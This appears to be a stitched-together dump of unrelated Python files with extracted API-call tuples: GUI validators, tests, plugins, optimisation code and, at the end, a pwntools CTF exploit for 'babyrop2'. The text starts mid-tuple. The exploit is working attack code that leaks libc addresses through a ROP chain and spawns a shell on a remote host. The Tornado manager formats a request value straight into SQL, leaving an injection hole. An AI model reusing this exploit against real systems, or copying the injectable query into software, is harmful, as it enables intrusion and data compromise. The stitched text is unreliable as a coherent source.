'(train_dogs_dir, fname)\n', (2029, 2052), False, 'import os\n'), ((2253, 2285), 'matplotlib.pyplot.subplot', 'plt.subplot', (['nrows', 'ncols', '(i + 1)'], {}), '(nrows, ncols, i + 1)\n', (2264, 2285), True, 'import matplotlib.pyplot as plt\n'), ((2345, 2367), 'matplotlib.image.imread', 'mpimg.imread', (['img_path'], {}), '(img_path)\n', (2357, 2367), True, 'import matplotlib.image as mpimg\n'), ((1292, 1318), 'os.listdir', 'os.listdir', (['train_cats_dir'], {}), '(train_cats_dir)\n', (1302, 1318), False, 'import os\n'), ((1370, 1396), 'os.listdir', 'os.listdir', (['train_dogs_dir'], {}), '(train_dogs_dir)\n', (1380, 1396), False, 'import os\n'), ((1451, 1482), 'os.listdir', 'os.listdir', (['validation_cats_dir'], {}), '(validation_cats_dir)\n', (1461, 1482), False, 'import os\n'), ((1531, 1562), 'os.listdir', 'os.listdir', (['validation_dogs_dir'], {}), '(validation_dogs_dir)\n', (1541, 1562), False, 'import os\n'), ((2721, 2806), 'tensorflow.keras.layers.Conv2D', 'tf.keras.layers.Conv2D', (['(16)', '(3, 3)'], {'activation': '"""relu"""', 'input_shape': '(150, 150, 3)'}), "(16, (3, 3), activation='relu', input_shape=(150, 150, 3)\n )\n", (2743, 2806), True, 'import tensorflow as tf\n'), ((2806, 2840), 'tensorflow.keras.layers.MaxPooling2D', 'tf.keras.layers.MaxPooling2D', (['(2)', '(2)'], {}), '(2, 2)\n', (2834, 2840), True, 'import tensorflow as tf\n'), ((2845, 2898), 'tensorflow.keras.layers.Conv2D', 'tf.keras.layers.Conv2D', (['(32)', '(3, 3)'], {'activation': '"""relu"""'}), "(32, (3, 3), activation='relu')\n", (2867, 2898), True, 'import tensorflow as tf\n'), ((2903, 2937), 'tensorflow.keras.layers.MaxPooling2D', 'tf.keras.layers.MaxPooling2D', (['(2)', '(2)'], {}), '(2, 2)\n', (2931, 2937), True, 'import tensorflow as tf\n'), ((2943, 2996), 'tensorflow.keras.layers.Conv2D', 'tf.keras.layers.Conv2D', (['(64)', '(3, 3)'], {'activation': '"""relu"""'}), "(64, (3, 3), activation='relu')\n", (2965, 2996), True, 'import tensorflow as tf\n'), ((3002, 3036), 'tensorflow.keras.layers.MaxPooling2D', 'tf.keras.layers.MaxPooling2D', (['(2)', '(2)'], {}), '(2, 2)\n', (3030, 3036), True, 'import tensorflow as tf\n'), ((3086, 3111), 'tensorflow.keras.layers.Flatten', 'tf.keras.layers.Flatten', ([], {}), '()\n', (3109, 3111), True, 'import tensorflow as tf\n'), ((3148, 3193), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(512)'], {'activation': '"""relu"""'}), "(512, activation='relu')\n", (3169, 3193), True, 'import tensorflow as tf\n'), ((3319, 3365), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(1)'], {'activation': '"""sigmoid"""'}), "(1, activation='sigmoid')\n", (3340, 3365), True, 'import tensorflow as tf\n')]
|
import tkinter as tk
def int_validate(entry_widget, from_=None, to=None):
"""
Validates an entry_widget so that only integers within a specified range may be entered
:param entry_widget: The tkinter.Entry widget to validate
:param from_: The start limit of the integer
:param to: The end limit of the integer
:return: None
"""
from_ = from_ if from_ is not None else entry_widget.configure()['from'][4]
to = to if to is not None else entry_widget.configure()['to'][4]
num_str = entry_widget.get()
current = None if (not _is_int(num_str)) else int(num_str)
check = _NumberCheck(entry_widget, from_, to, current=current)
entry_widget.config(validate='all')
entry_widget.config(validatecommand=check.vcmd)
entry_widget.bind('<FocusOut>', lambda event: _validate(entry_widget, check))
_validate(entry_widget, check)
def _is_int(num_str):
"""
Returns whether or not a given string is an integer
:param num_str: The string to test
:return: Whether or not the string is an integer
"""
try:
int(num_str)
return True
except ValueError:
return False
def _validate(entry, num_check):
"""
Validates an entry so if there is invalid text in it it will be replaced by the last valid text
:param entry: The entry widget
:param num_check: The _NumberCheck instance that keeps track of the last valid number
:return: None
"""
if not _is_int(entry.get()):
entry.delete(0, tk.END)
entry.insert(0, str(num_check.last_valid))
class _NumberCheck:
"""
Class used for validating entry widgets, self.vcmd is provided as the validatecommand
"""
def __init__(self, parent, min_, max_, current):
self.parent = parent
self.low = min_
self.high = max_
self.vcmd = parent.register(self.in_integer_range), '%d', '%P'
if _NumberCheck.in_range(0, min_, max_):
self.last_valid = 0
else:
self.last_valid = min_
if current is not None:
self.last_valid = current
def in_integer_range(self, type_, after_text):
"""
Validates an entry to make sure the correct text is being inputted
:param type_: 0 for deletion, 1 for insertion, -1 for focus in
:param after_text: The text that the entry will display if validated
:return:
"""
if type_ == '-1':
if _is_int(after_text):
self.last_valid = int(after_text)
# Delete Action, always okay, if valid number save it
elif type_ == '0':
try:
num = int(after_text)
self.last_valid = num
except ValueError:
pass
return True
# Insert Action, okay based on ranges, if valid save num
elif type_ == '1':
try:
num = int(after_text)
except ValueError:
if self.can_be_negative() and after_text == '-':
return True
return False
if self.is_valid_range(num):
self.last_valid = num
return True
return False
return False
def can_be_negative(self):
"""
Tests whether this given entry widget can have a negative number
:return: Whether or not the entry can have a negative number
"""
return (self.low is None) or (self.low < 0)
def is_valid_range(self, num):
"""
Tests whether the given number is valid for this entry widgets range
:param num: The number to range test
:return: Whether or not the number is in range
"""
return _NumberCheck.in_range(num, self.low, self.high)
@staticmethod
def in_range(num, low, high):
"""
Tests whether or not a number is within a specified range inclusive
:param num: The number to test if its in the range
:param low: The minimum of the range
:param high: The maximum of the range
:return: Whether or not the number is in the range
"""
if (low is not None) and (num < low):
return False
if (high is not None) and (num > high):
return False
return True
if __name__ == '__main__':
import tkinter as tk
from tkinter import ttk
root = tk.Tk()
widget = ttk.Spinbox(root, justify=tk.CENTER, from_=-5, to_=10)
widget.pack(padx=10, pady=10)
int_validate(widget)
root.mainloop()
|
[
"tkinter.Tk",
"tkinter.ttk.Spinbox"
] |
[((4447, 4454), 'tkinter.Tk', 'tk.Tk', ([], {}), '()\n', (4452, 4454), True, 'import tkinter as tk\n'), ((4468, 4522), 'tkinter.ttk.Spinbox', 'ttk.Spinbox', (['root'], {'justify': 'tk.CENTER', 'from_': '(-5)', 'to_': '(10)'}), '(root, justify=tk.CENTER, from_=-5, to_=10)\n', (4479, 4522), False, 'from tkinter import ttk\n')]
|
# Modules
import subprocess
from os import name
from ..utils.bases import BaseCommand
# Command class
class Clear(BaseCommand):
def __init__(self, core):
self.core = core
def clear(self, arguments):
# Locate our command
command = "clear"
if name == "nt":
command = "cls"
# Execute
subprocess.run([command], shell = True)
|
[
"subprocess.run"
] |
[((354, 391), 'subprocess.run', 'subprocess.run', (['[command]'], {'shell': '(True)'}), '([command], shell=True)\n', (368, 391), False, 'import subprocess\n')]
|
# -*- coding: utf-8 -*-
# standard library
from unittest.mock import Mock
__author__ = "Ssu-Tsen"
__license__ = "Apache 2.0"
# standard library
# scip plugin
from ribbon.client.config.client_config import ClientConfig
from spring_cloud.ribbon.spring_client_factory import DynamicServerListLoadBalancer, SpringClientFactory
class TestSpringClientFactory:
eureka_client = Mock()
eureka_client.get_instances_by_virtual_host_name = Mock(return_value=[])
spring_client_factory = SpringClientFactory(eureka_client)
def test_get_client_config(self):
assert isinstance(self.spring_client_factory.get_client_config("1"), ClientConfig)
assert self.spring_client_factory.get_client_config("2") == self.spring_client_factory.get_client_config("2")
def test_get_load_balancer(self):
assert isinstance(self.spring_client_factory.get_load_balancer("1"), DynamicServerListLoadBalancer)
assert self.spring_client_factory.get_load_balancer("2") == self.spring_client_factory.get_load_balancer("2")
|
[
"unittest.mock.Mock",
"spring_cloud.ribbon.spring_client_factory.SpringClientFactory"
] |
[((379, 385), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (383, 385), False, 'from unittest.mock import Mock\n'), ((441, 462), 'unittest.mock.Mock', 'Mock', ([], {'return_value': '[]'}), '(return_value=[])\n', (445, 462), False, 'from unittest.mock import Mock\n'), ((491, 525), 'spring_cloud.ribbon.spring_client_factory.SpringClientFactory', 'SpringClientFactory', (['eureka_client'], {}), '(eureka_client)\n', (510, 525), False, 'from spring_cloud.ribbon.spring_client_factory import DynamicServerListLoadBalancer, SpringClientFactory\n')]
|
#!/usr/bin/env python
from rich.progress import track
from rich import print
from rich.progress import Progress
from rich.table import Column
from rich.progress import Progress, BarColumn, TextColumn,TimeRemainingColumn,SpinnerColumn,TimeElapsedColumn
from rich.console import Console
filename="big.fa"
seqCount=0
num_lines = sum(1 for line in open(filename,'r'))
print("num_lines:",num_lines)
console = Console(record=True)
with Progress(
SpinnerColumn(),
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
TimeRemainingColumn(),
TimeElapsedColumn(),
console=console,
transient=True,
) as progress:
task1 = progress.add_task("[green]Reading FASTA",total=num_lines)
with open(filename) as f:
for line in f:
progress.update(task1,advance=1)
if ">" in line:
seqCount+=1
progress.log(line.strip(),seqCount)
|
[
"rich.progress.TextColumn",
"rich.print",
"rich.progress.BarColumn",
"rich.progress.SpinnerColumn",
"rich.console.Console",
"rich.progress.TimeRemainingColumn",
"rich.progress.TimeElapsedColumn"
] |
[((366, 396), 'rich.print', 'print', (['"""num_lines:"""', 'num_lines'], {}), "('num_lines:', num_lines)\n", (371, 396), False, 'from rich import print\n'), ((407, 427), 'rich.console.Console', 'Console', ([], {'record': '(True)'}), '(record=True)\n', (414, 427), False, 'from rich.console import Console\n'), ((448, 463), 'rich.progress.SpinnerColumn', 'SpinnerColumn', ([], {}), '()\n', (461, 463), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n'), ((469, 523), 'rich.progress.TextColumn', 'TextColumn', (['"""[progress.description]{task.description}"""'], {}), "('[progress.description]{task.description}')\n", (479, 523), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n'), ((529, 540), 'rich.progress.BarColumn', 'BarColumn', ([], {}), '()\n', (538, 540), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n'), ((546, 605), 'rich.progress.TextColumn', 'TextColumn', (['"""[progress.percentage]{task.percentage:>3.0f}%"""'], {}), "('[progress.percentage]{task.percentage:>3.0f}%')\n", (556, 605), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n'), ((611, 632), 'rich.progress.TimeRemainingColumn', 'TimeRemainingColumn', ([], {}), '()\n', (630, 632), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n'), ((638, 657), 'rich.progress.TimeElapsedColumn', 'TimeElapsedColumn', ([], {}), '()\n', (655, 657), False, 'from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn, SpinnerColumn, TimeElapsedColumn\n')]
|
import dataclasses
import pathlib
import subprocess
from typing import DefaultDict, List, Sequence
import dacite
from pysen.command import CommandBase
from pysen.component import ComponentBase, RunOptions
from pysen.path import change_dir
from pysen.plugin import PluginBase
from pysen.pyproject_model import Config, PluginConfig
from pysen.reporter import Reporter
from pysen.runner_options import PathContext
from pysen.setting import SettingFile
class ShellCommand(CommandBase):
def __init__(self, name: str, base_dir: pathlib.Path, cmd: Sequence[str]) -> None:
self._name = name
self._base_dir = base_dir
self._cmd = cmd
@property
def name(self) -> str:
return self._name
def __call__(self, reporter: Reporter) -> int:
with change_dir(self._base_dir):
try:
ret = subprocess.run(self._cmd)
reporter.logger.info(f"{self._cmd} returns {ret.returncode}")
return ret.returncode
except BaseException as e:
reporter.logger.info(
f"an error occured while executing: {self._cmd}\n{e}"
)
return 255
class ShellComponent(ComponentBase):
def __init__(self, name: str, cmd: Sequence[str], targets: Sequence[str]) -> None:
self._name = name
self._cmd = cmd
self._targets = targets
@property
def name(self) -> str:
return self._name
def export_settings(
self, paths: PathContext, files: DefaultDict[str, SettingFile],
) -> None:
print(f"Called export_settings at {self._name}: do nothing")
@property
def targets(self) -> Sequence[str]:
return self._targets
def create_command(
self, target: str, paths: PathContext, options: RunOptions
) -> CommandBase:
assert target in self._targets
return ShellCommand(self._name, paths.base_dir, self._cmd)
@dataclasses.dataclass
class ShellPluginConfig:
name: str
command: List[str]
targets: List[str]
class ShellPlugin(PluginBase):
def load(
self, file_path: pathlib.Path, config_data: PluginConfig, root: Config
) -> Sequence[ComponentBase]:
assert (
config_data.config is not None
), f"{config_data.location}.config must be not None"
config = dacite.from_dict(
ShellPluginConfig, config_data.config, dacite.Config(strict=True)
)
return [ShellComponent(config.name, config.command, config.targets)]
# NOTE(igarashi): This is the entry point of a plugin method
def plugin() -> PluginBase:
return ShellPlugin()
|
[
"dacite.Config",
"pysen.path.change_dir",
"subprocess.run"
] |
[((790, 816), 'pysen.path.change_dir', 'change_dir', (['self._base_dir'], {}), '(self._base_dir)\n', (800, 816), False, 'from pysen.path import change_dir\n'), ((2434, 2460), 'dacite.Config', 'dacite.Config', ([], {'strict': '(True)'}), '(strict=True)\n', (2447, 2460), False, 'import dacite\n'), ((857, 882), 'subprocess.run', 'subprocess.run', (['self._cmd'], {}), '(self._cmd)\n', (871, 882), False, 'import subprocess\n')]
|
from __future__ import absolute_import
from nightson.managers.base_entity_manager import BaseEntityManager
from tornado import gen
class EventUsersManager(BaseEntityManager):
def __init__(self):
pass
def __init__(self, request):
super(EventUsersManager, self).__init__(request)
@gen.coroutine
def get_users(self):
event_id = self.get_value('event_id')
sql = ''' SELECT
Users.id,
Users.first_name,
Users.last_name,
Users.photo_url,
ST_AsGeoJson(location) AS location,
Users.location_recorded_at
FROM UsersEvents INNER JOIN Users ON Users.id = UsersEvents.user_id
WHERE event_id = {0} ; '''.format(event_id)
result = yield self.execute_sql(sql)
raise gen.Return(result)
|
[
"tornado.gen.Return"
] |
[((863, 881), 'tornado.gen.Return', 'gen.Return', (['result'], {}), '(result)\n', (873, 881), False, 'from tornado import gen\n')]
|
"""
###########################################################################
# @file optimization_utils.py
# @brief Functions for optimizing transformations and parameters.
#
# @author <NAME>
#
# @Link: https://www.cbica.upenn.edu/sbia/software/
#
# @Contact: <EMAIL>
##########################################################################
"""
import numpy as np
from numpy import transpose as Tr
def initialization(x,y,K):
np.random.seed()
D,M = x.shape
N = y.shape[1]
params = {'delta':None,'sigsq':None,'T':None,'t':None}
params['delta'] = np.ones((K,M))/K
sigsq = 0
for n in range(N):
tmp = x - y[:,n].reshape(-1,1)
sigsq = sigsq + np.sum(np.power(tmp,2))
params['sigsq'] = sigsq/D/M/N;
params['T'] = np.repeat(np.eye(D).reshape(D,D,1),K,axis=2)
params['t'] = np.random.uniform(size=(D,K))
return params
def transform( x,params ):
T = params['T']
t = params['t']
delta = params['delta']
[D,M] = x.shape
K = T.shape[2]
transformed_x = np.zeros((D,M))
Tym = np.zeros((D,M,K))
for k in range(K):
Tym[:,:,k] = np.dot(T[:,:,k], x) + t[:,k].reshape(-1,1)
for m in range(M):
tmp = np.zeros(D)
for k in range(K):
tmp = tmp + delta[k,m] * Tym[:,m,k]
transformed_x[:,m] = tmp;
return transformed_x
def transform2( x,params ):
T = params['T']
delta = params['delta']
D,M = x.shape
K = T.shape[2]
transformed_x = np.zeros((D,M))
Tym = np.zeros((D,M,K))
for k in range(K):
Tym[:,:,k] = np.dot(T[:,:,k],x)
for m in range(M):
tmp = np.zeros(D)
for k in range(K):
tmp = tmp + delta[k,m] * Tym[:,m,k]
transformed_x[:,m] = tmp
return transformed_x
def transform3( x,params ):
T = params['T']
t = params['t']
D,K = t.shape
transformed_x = np.zeros((D,K))
for k in range(K):
transformed_x[:,k] = np.dot(T[:,:,k],x) + t[:,k]
return transformed_x
def Estep(y,yd,ys,tx,xd,xs,sigsq,r,rs):
"""Expectation calculation.
"""
M = tx.shape[1]
N = y.shape[1]
#> calculate RBF kernel distance based on imaging features
D1 = np.diag(np.dot(Tr(y),y))
D2 = np.diag(np.dot(Tr(tx),tx))
Mid = 2 * np.dot(Tr(y),tx)
tmp1 = D1.reshape(-1,1).repeat(M,axis=1) - Mid + D2.reshape(1,-1).repeat(N,axis=0)
#> calculate RBF kernel distance based on covariate features
tmp2 = np.zeros(tmp1.shape)
if r != 0:
D1 = np.diag(np.dot(Tr(yd),yd))
D2 = np.diag(np.dot(Tr(xd),xd))
Mid = 2 * np.dot(Tr(yd),xd)
tmp2 = D1.reshape(-1,1).repeat(M,axis=1) - Mid + D2.reshape(1,-1).repeat(N,axis=0)
#> calculate RBF kernel distance based on set information
tmp3 = np.zeros(tmp1.shape)
if rs != 0:
D1 = np.diag(np.dot(Tr(ys),ys))
D2 = np.diag(np.dot(Tr(xs),xs))
Mid = 2 * np.dot(Tr(ys),xs)
tmp3 = D1.reshape(-1,1).repeat(M,axis=1) - Mid + D2.reshape(1,-1).repeat(N,axis=0)
#> combine distances and normlize to probability distribution
P = np.exp((-tmp1-r*tmp2-rs*tmp3)/2/sigsq)+np.finfo(np.float).tiny
P = P/np.sum(P,axis=1).reshape(-1,1)
return P
def Mstep(y,yd,ys,x,tx,xd,xs,P,params,config):
"""Mstep optimization, for different transformation import different modules
"""
if config['transform'] == 'affine':
from Mstep_affine import solve_sigsq,solve_delta,solve_T,solve_t
elif config['transform'] == 'duo':
from Mstep_duo import solve_sigsq,solve_delta,solve_T,solve_t
else:
from Mstep_trans import solve_sigsq,solve_delta,solve_T,solve_t
params['sigsq'] = solve_sigsq(y,yd,ys,tx,xd,xs,P,params,config)
params['delta'] = solve_delta(y,x,P,params)
params['T'] = solve_T(y,x,P,params,config)
params['t'] = solve_t(y,x,P,params,config)
return params
def calc_obj(x,y,xd,yd,xs,ys,P,params,config):
"""Objective function calculation
"""
lambda1 = config['lambda1']
lambda2 = config['lambda2']
r = config['r']
rs = config['rs']
K = config['K']
D,N = y.shape
M = x.shape[1]
d = 0
ds = 0
IM = np.ones((M,1))
IN = np.ones((N,1))
tx = transform(x,params)
tmp = 0
for i in range(K):
tmp = tmp + np.power(np.linalg.norm(params['T'][:,:,i]-np.eye(D),'fro'),2)
P1 = np.diag(np.dot(P,IM).flatten())
P2 = np.diag(np.dot(Tr(P),IN).flatten())
term1 = np.trace(y.dot(P1).dot(Tr(y)) - 2*y.dot(P).dot(Tr(tx)) + tx.dot(P2).dot(Tr(tx)))
term2 = 0
if r != 0:
d = xd.shape[0]
term2 = r * np.trace(yd.dot(P1).dot(Tr(yd)) - 2*yd.dot(P).dot(Tr(xd)) + xd.dot(P2).dot(Tr(xd)))
term3 = 0
if rs != 0:
ds = 1
term3 = rs * np.trace(ys.dot(P1).dot(Tr(ys)) - 2*ys.dot(P).dot(Tr(xs)) + xs.dot(P2).dot(Tr(xs)))
obj = 0.5/params['sigsq'] * ( term1 + term2 + term3 \
+ lambda1*np.power(np.linalg.norm(params['t'],'fro'),2) +lambda2*tmp) \
+ N*(D+d+ds)/2.0*np.log(params['sigsq'])
return obj
|
[
"numpy.random.uniform",
"Mstep_trans.solve_delta",
"numpy.random.seed",
"numpy.log",
"numpy.eye",
"Mstep_trans.solve_T",
"numpy.sum",
"Mstep_trans.solve_sigsq",
"numpy.power",
"numpy.zeros",
"numpy.ones",
"numpy.transpose",
"numpy.finfo",
"numpy.linalg.norm",
"numpy.exp",
"Mstep_trans.solve_t",
"numpy.dot"
] |
[((435, 451), 'numpy.random.seed', 'np.random.seed', ([], {}), '()\n', (449, 451), True, 'import numpy as np\n'), ((832, 862), 'numpy.random.uniform', 'np.random.uniform', ([], {'size': '(D, K)'}), '(size=(D, K))\n', (849, 862), True, 'import numpy as np\n'), ((1040, 1056), 'numpy.zeros', 'np.zeros', (['(D, M)'], {}), '((D, M))\n', (1048, 1056), True, 'import numpy as np\n'), ((1071, 1090), 'numpy.zeros', 'np.zeros', (['(D, M, K)'], {}), '((D, M, K))\n', (1079, 1090), True, 'import numpy as np\n'), ((1508, 1524), 'numpy.zeros', 'np.zeros', (['(D, M)'], {}), '((D, M))\n', (1516, 1524), True, 'import numpy as np\n'), ((1539, 1558), 'numpy.zeros', 'np.zeros', (['(D, M, K)'], {}), '((D, M, K))\n', (1547, 1558), True, 'import numpy as np\n'), ((1919, 1935), 'numpy.zeros', 'np.zeros', (['(D, K)'], {}), '((D, K))\n', (1927, 1935), True, 'import numpy as np\n'), ((2498, 2518), 'numpy.zeros', 'np.zeros', (['tmp1.shape'], {}), '(tmp1.shape)\n', (2506, 2518), True, 'import numpy as np\n'), ((2819, 2839), 'numpy.zeros', 'np.zeros', (['tmp1.shape'], {}), '(tmp1.shape)\n', (2827, 2839), True, 'import numpy as np\n'), ((3733, 3786), 'Mstep_trans.solve_sigsq', 'solve_sigsq', (['y', 'yd', 'ys', 'tx', 'xd', 'xs', 'P', 'params', 'config'], {}), '(y, yd, ys, tx, xd, xs, P, params, config)\n', (3744, 3786), False, 'from Mstep_trans import solve_sigsq, solve_delta, solve_T, solve_t\n'), ((3801, 3829), 'Mstep_trans.solve_delta', 'solve_delta', (['y', 'x', 'P', 'params'], {}), '(y, x, P, params)\n', (3812, 3829), False, 'from Mstep_trans import solve_sigsq, solve_delta, solve_T, solve_t\n'), ((3845, 3877), 'Mstep_trans.solve_T', 'solve_T', (['y', 'x', 'P', 'params', 'config'], {}), '(y, x, P, params, config)\n', (3852, 3877), False, 'from Mstep_trans import solve_sigsq, solve_delta, solve_T, solve_t\n'), ((3892, 3924), 'Mstep_trans.solve_t', 'solve_t', (['y', 'x', 'P', 'params', 'config'], {}), '(y, x, P, params, config)\n', (3899, 3924), False, 'from Mstep_trans import solve_sigsq, solve_delta, solve_T, solve_t\n'), ((4252, 4267), 'numpy.ones', 'np.ones', (['(M, 1)'], {}), '((M, 1))\n', (4259, 4267), True, 'import numpy as np\n'), ((4276, 4291), 'numpy.ones', 'np.ones', (['(N, 1)'], {}), '((N, 1))\n', (4283, 4291), True, 'import numpy as np\n'), ((575, 590), 'numpy.ones', 'np.ones', (['(K, M)'], {}), '((K, M))\n', (582, 590), True, 'import numpy as np\n'), ((1218, 1229), 'numpy.zeros', 'np.zeros', (['D'], {}), '(D)\n', (1226, 1229), True, 'import numpy as np\n'), ((1601, 1622), 'numpy.dot', 'np.dot', (['T[:, :, k]', 'x'], {}), '(T[:, :, k], x)\n', (1607, 1622), True, 'import numpy as np\n'), ((1662, 1673), 'numpy.zeros', 'np.zeros', (['D'], {}), '(D)\n', (1670, 1673), True, 'import numpy as np\n'), ((3142, 3192), 'numpy.exp', 'np.exp', (['((-tmp1 - r * tmp2 - rs * tmp3) / 2 / sigsq)'], {}), '((-tmp1 - r * tmp2 - rs * tmp3) / 2 / sigsq)\n', (3148, 3192), True, 'import numpy as np\n'), ((1133, 1154), 'numpy.dot', 'np.dot', (['T[:, :, k]', 'x'], {}), '(T[:, :, k], x)\n', (1139, 1154), True, 'import numpy as np\n'), ((1992, 2013), 'numpy.dot', 'np.dot', (['T[:, :, k]', 'x'], {}), '(T[:, :, k], x)\n', (1998, 2013), True, 'import numpy as np\n'), ((2253, 2258), 'numpy.transpose', 'Tr', (['y'], {}), '(y)\n', (2255, 2258), True, 'from numpy import transpose as Tr\n'), ((2287, 2293), 'numpy.transpose', 'Tr', (['tx'], {}), '(tx)\n', (2289, 2293), True, 'from numpy import transpose as Tr\n'), ((2320, 2325), 'numpy.transpose', 'Tr', (['y'], {}), '(y)\n', (2322, 2325), True, 'from numpy import transpose as Tr\n'), ((3181, 3199), 'numpy.finfo', 'np.finfo', (['np.float'], {}), '(np.float)\n', (3189, 3199), True, 'import numpy as np\n'), ((5108, 5131), 'numpy.log', 'np.log', (["params['sigsq']"], {}), "(params['sigsq'])\n", (5114, 5131), True, 'import numpy as np\n'), ((699, 715), 'numpy.power', 'np.power', (['tmp', '(2)'], {}), '(tmp, 2)\n', (707, 715), True, 'import numpy as np\n'), ((779, 788), 'numpy.eye', 'np.eye', (['D'], {}), '(D)\n', (785, 788), True, 'import numpy as np\n'), ((2562, 2568), 'numpy.transpose', 'Tr', (['yd'], {}), '(yd)\n', (2564, 2568), True, 'from numpy import transpose as Tr\n'), ((2602, 2608), 'numpy.transpose', 'Tr', (['xd'], {}), '(xd)\n', (2604, 2608), True, 'from numpy import transpose as Tr\n'), ((2639, 2645), 'numpy.transpose', 'Tr', (['yd'], {}), '(yd)\n', (2641, 2645), True, 'from numpy import transpose as Tr\n'), ((2884, 2890), 'numpy.transpose', 'Tr', (['ys'], {}), '(ys)\n', (2886, 2890), True, 'from numpy import transpose as Tr\n'), ((2924, 2930), 'numpy.transpose', 'Tr', (['xs'], {}), '(xs)\n', (2926, 2930), True, 'from numpy import transpose as Tr\n'), ((2961, 2967), 'numpy.transpose', 'Tr', (['ys'], {}), '(ys)\n', (2963, 2967), True, 'from numpy import transpose as Tr\n'), ((3215, 3232), 'numpy.sum', 'np.sum', (['P'], {'axis': '(1)'}), '(P, axis=1)\n', (3221, 3232), True, 'import numpy as np\n'), ((4469, 4482), 'numpy.dot', 'np.dot', (['P', 'IM'], {}), '(P, IM)\n', (4475, 4482), True, 'import numpy as np\n'), ((4623, 4629), 'numpy.transpose', 'Tr', (['tx'], {}), '(tx)\n', (4625, 4629), True, 'from numpy import transpose as Tr\n'), ((4517, 4522), 'numpy.transpose', 'Tr', (['P'], {}), '(P)\n', (4519, 4522), True, 'from numpy import transpose as Tr\n'), ((4574, 4579), 'numpy.transpose', 'Tr', (['y'], {}), '(y)\n', (4576, 4579), True, 'from numpy import transpose as Tr\n'), ((4423, 4432), 'numpy.eye', 'np.eye', (['D'], {}), '(D)\n', (4429, 4432), True, 'import numpy as np\n'), ((4598, 4604), 'numpy.transpose', 'Tr', (['tx'], {}), '(tx)\n', (4600, 4604), True, 'from numpy import transpose as Tr\n'), ((4780, 4786), 'numpy.transpose', 'Tr', (['xd'], {}), '(xd)\n', (4782, 4786), True, 'from numpy import transpose as Tr\n'), ((4930, 4936), 'numpy.transpose', 'Tr', (['xs'], {}), '(xs)\n', (4932, 4936), True, 'from numpy import transpose as Tr\n'), ((4729, 4735), 'numpy.transpose', 'Tr', (['yd'], {}), '(yd)\n', (4731, 4735), True, 'from numpy import transpose as Tr\n'), ((4879, 4885), 'numpy.transpose', 'Tr', (['ys'], {}), '(ys)\n', (4881, 4885), True, 'from numpy import transpose as Tr\n'), ((5027, 5061), 'numpy.linalg.norm', 'np.linalg.norm', (["params['t']", '"""fro"""'], {}), "(params['t'], 'fro')\n", (5041, 5061), True, 'import numpy as np\n'), ((4755, 4761), 'numpy.transpose', 'Tr', (['xd'], {}), '(xd)\n', (4757, 4761), True, 'from numpy import transpose as Tr\n'), ((4905, 4911), 'numpy.transpose', 'Tr', (['xs'], {}), '(xs)\n', (4907, 4911), True, 'from numpy import transpose as Tr\n')]
|
from pwn import *
from LibcSearcher import LibcSearcher
############################
#********修改文件名**********
############################
file_name = 'babyrop2'
port = 27150
io = -1
###########修改宏###########
DEBUG = 1
LOG_PRINT = 1
TMUX = 0
def LOG_ADDR_SUCCESS(name:str, addr:int):
'''
打印地址
name: 变量名,str
addr: 地址,int
'''
global LOG_PRINT
if LOG_PRINT:
log.success('{} ===> {}'.format(name, hex(addr)))
def LOG_SUCCESS(info):
'''
打印信息
'''
if LOG_PRINT:
log.success(info)
def Get_Str_Addr(target_addr:str):
"""
获取字符串的地址
"""
global io
return io.search(target_addr.encode()).__next__()
if DEBUG: # 本地打
io = process('./{}'.format(file_name))
if TMUX:
context.terminal = ['tmux', 'splitw', '-h']
gdb.attach(io, gdbscript='b *0x80489a\nc\n')
else: # 远程打
io = remote('node3.buuoj.cn', port)
io_elf = ELF('./{}'.format(file_name))
log.success("libc used ===> {}".format(io_elf.libc))
context.log_level = 'debug'
log.success('='*100)
##########################下面为攻击代码#######################
##########################下面为攻击代码#######################
main_addr = io_elf.sym['main']
printf_plt_addr = io_elf.plt['printf']
libc_start_main_got = io_elf.got['__libc_start_main']
pop_rdi_ret = 0x400733
pop_rsi_r15 = 0x400731
# 64位下需要一个格式化字符串来泄露,与32位不一样!!
# 64位下的ROP可能还需要维持栈平衡,用ret指令!!!
format_str_addr = 0x400770
ret_addr = 0x4004d1
LOG_ADDR_SUCCESS('main_addr', main_addr)
LOG_ADDR_SUCCESS('printf_plt_addr', printf_plt_addr)
LOG_ADDR_SUCCESS('libc_start_main_got', libc_start_main_got)
#
io.recvuntil("What's your name? ")
# 利用printf泄露基地址
payload = (0x20 + 8) * b'a'
payload += p64(pop_rdi_ret) + p64(format_str_addr) + p64(pop_rsi_r15) + p64(libc_start_main_got) + p64(0) + p64(printf_plt_addr) +p64(ret_addr) + p64(main_addr)
io.sendline(payload)
message = io.recv()
index = message.index(b'\x7f')
libc_start_main_addr = message[index - 5: index + 1]
libc_start_main_addr = u64(libc_start_main_addr.ljust(8, b'\x00'))
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libc_base_addr = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libc_base_addr + libc.dump('system')
str_bin_sh = libc_base_addr + libc.dump('str_bin_sh')
LOG_ADDR_SUCCESS('libc_start_main_addr', libc_start_main_addr)
LOG_ADDR_SUCCESS('libc_base_addr', libc_base_addr)
LOG_ADDR_SUCCESS('sytem_addr', system_addr)
LOG_ADDR_SUCCESS('str_bin_sh', str_bin_sh)
# io.recv()
payload = (0x20 + 8) * b'a'
payload += p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(ret_addr) + p64(main_addr)
io.sendline(payload)
# io.recvuntil('bytes of data!\n')
io.interactive()
|
[
"LibcSearcher.LibcSearcher"
] |
